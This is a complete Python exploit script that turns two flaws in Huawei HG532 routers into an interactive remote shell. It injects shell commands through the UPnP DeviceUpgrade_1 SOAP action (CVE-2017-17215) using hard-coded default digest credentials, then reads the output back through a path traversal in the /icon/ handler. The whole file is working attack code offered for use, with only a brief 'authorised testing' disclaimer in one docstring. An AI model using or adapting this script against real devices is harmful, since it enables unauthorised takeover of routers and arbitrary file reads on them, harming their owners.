#!/bin/python
'''
Author : Rebellion
Github : @rebe11ion
Twitter : @rebellion
'''
import os
import subprocess
import sys
import urllib2

import requests
from requests.auth import HTTPDigestAuth
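# Request defaults shared by every HTTP call this script makes.
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5

# Port of the router's UPnP service; both the injectable DeviceUpgrade_1
# SOAP action and the traversable /icon/ handler are served from it.
UPNP_PORT = 37215

# Digest credentials the original exploit presents to DeviceUpgrade_1;
# affected firmware accepts them.
UPNP_CREDENTIALS = ("dslf-config", "admin")


def fetch_url(url):
    """Return the raw body of an HTTP GET to *url*.

    urllib2 is used on purpose: recent urllib3/requests releases normalise
    ``..`` segments out of the path before sending (RFC 3986 dot-segment
    removal), which would silently defeat the traversal built by
    build_traversal_url() -- confirm against the urllib3 you ship before
    swapping this out.

    Raises urllib2.URLError (and its HTTPError subclass) on transport or
    HTTP failure; callers decide how to report it.
    """
    request = urllib2.Request(url, headers=DEFAULT_HEADERS)
    response = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT)
    try:
        return response.read()
    finally:
        response.close()


def build_traversal_url(ip, path):
    """Return the /icon/ path-traversal URL exposing the router file *path*.

    *path* must be absolute: the traversal climbs out of the icon directory
    to the filesystem root and the target path is appended verbatim.

    Raises ValueError for a relative path (a plain ``raise`` rather than
    ``assert`` so the check survives ``python -O``).
    """
    if not path.startswith("/"):
        raise ValueError("An absolute path is required: %r" % (path,))
    return "http://%s:%d/icon/../../../%s" % (ip, UPNP_PORT, path)


def exploit(ip, path):
    """Read the file *path* from the router at *ip* through the traversal."""
    return fetch_url(build_traversal_url(ip, path))


def build_upgrade_url(ip):
    """Return the DeviceUpgrade_1 SOAP endpoint on the router at *ip*."""
    return "http://%s:%d/ctrlt/DeviceUpgrade_1" % (ip, UPNP_PORT)


def build_upgrade_envelope(shell_cmd):
    """Return the SOAP body for the Upgrade action with *shell_cmd* injected.

    The device expands NewStatusURL in a shell, so wrapping the command in
    ``$( ... )`` executes it.  The caller must avoid characters that break
    the XML (``<``, ``&``) or the ``$()`` grouping (an unbalanced ``)``);
    they are passed through untouched here.
    """
    return (
        '<?xml version="1.0" ?>\n'
        ' <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\n'
        ' <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">\n'
        ' <NewStatusURL>$(' + shell_cmd + ')</NewStatusURL>\n'
        '<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n'
        '</u:Upgrade>\n'
        ' </s:Body>\n'
        ' </s:Envelope>'
    )


def build_remote_command(cwd, shell_cmd, cmd_path, pwd_path):
    """Wrap *shell_cmd* so it runs inside *cwd* on the router.

    Its stdout is redirected to *cmd_path* and the working directory after
    it ran is saved to *pwd_path*; both are read back via exploit().
    """
    return "cd {} ; {} > {} ; pwd > {}".format(cwd, shell_cmd, cmd_path, pwd_path)


def split_pipeline(line):
    """Split an interactive line into ``(remote_cmd, local_filter)``.

    Text before the first ``|`` runs on the router; everything after it
    (which may itself contain further pipes) runs locally over the fetched
    output.  *local_filter* is None when the line has no pipe.
    """
    remote, sep, local = line.partition("|")
    return remote.strip(), (local.strip() if sep else None)


def send_command(ip, shell_cmd):
    """POST the SOAP injection carrying *shell_cmd* to the router at *ip*.

    The HTTP response is not inspected: the command's output is collected
    afterwards by reading the scratch file back through exploit().  Raises
    requests.exceptions.RequestException on transport failure or timeout.
    """
    requests.post(
        build_upgrade_url(ip),
        auth=HTTPDigestAuth(*UPNP_CREDENTIALS),
        data=build_upgrade_envelope(shell_cmd),
        headers=DEFAULT_HEADERS,
        timeout=DEFAULT_TIMEOUT,
    )


def show_output(data, local_filter):
    """Print router output *data*, optionally through a local shell pipeline.

    *local_filter* is what the operator typed after ``|`` and is run with
    ``shell=True`` deliberately: it is the operator's own input on the
    operator's own machine.  Router output only reaches it via stdin and is
    never interpolated into shell text.  Nothing is written to the local
    filesystem (the old code mirrored the output into a fixed /tmp path).
    """
    if local_filter is None:
        # sys.stdout.buffer exists on Python 3 only; *data* is a byte string.
        out = getattr(sys.stdout, "buffer", sys.stdout)
        out.write(data)
        out.flush()
        return
    proc = subprocess.Popen(local_filter, shell=True, stdin=subprocess.PIPE)
    proc.communicate(data)


def main():
    """Interactive pseudo-shell on a Huawei HG532 router.

    Usage: ``python <script> <router-ip>``.  Each line is executed on the
    router via the DeviceUpgrade_1 command injection (CVE-2017-17215) and
    its output is fetched back through the /icon/ traversal.  ``cd`` updates
    the prompt's working directory, ``clear`` is local only, and
    ``cmd | filter`` runs ``cmd`` remotely and ``filter`` locally.

    Only use against devices you are authorised to test.  If the injection
    does not fire (patched firmware, rejected auth) the read-back returns
    whatever the scratch file held before, or fails with a 404, so an
    unchanged answer may be stale output rather than a real result.
    """
    if len(sys.argv) < 2:
        sys.stderr.write("usage: %s <router-ip>\n" % (sys.argv[0],))
        sys.exit(2)
    # Previously the SOAP request went to a hard-coded 192.168.1.1 while the
    # results were fetched from argv[1]; both now use the same target.
    targetip = sys.argv[1]
    # Scratch files on the ROUTER, not locally: command output and the
    # working directory after the command.
    cmd_path = "/tmp/ccmd"
    pwd_path = "/tmp/cpwd"
    cwd = "/"
    while True:
        try:
            line = raw_input("[{}]$ ".format(cwd))
        except (EOFError, KeyboardInterrupt):
            sys.stdout.write("\n")
            break
        remote_cmd, local_filter = split_pipeline(line)
        if not remote_cmd:
            continue
        # Match on the command word, not a substring: "cd"/"cat" used to
        # match inside unrelated commands (e.g. "ls /etc/abcd").
        verb = remote_cmd.split()[0]
        if verb == "clear":
            os.system("clear")
            continue
        try:
            send_command(targetip, build_remote_command(cwd, remote_cmd, cmd_path, pwd_path))
            output = exploit(targetip, cmd_path)
            # Keep the old directory if the read-back is empty rather than
            # degrading the next command to "cd  ;".
            cwd = exploit(targetip, pwd_path).strip("\n") or cwd
        except (requests.exceptions.RequestException, urllib2.URLError) as err:
            sys.stderr.write("[!] request to %s failed: %s\n" % (targetip, err))
            continue
        if verb != "cd":
            show_output(output, local_filter)


if __name__ == "__main__":
    main()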
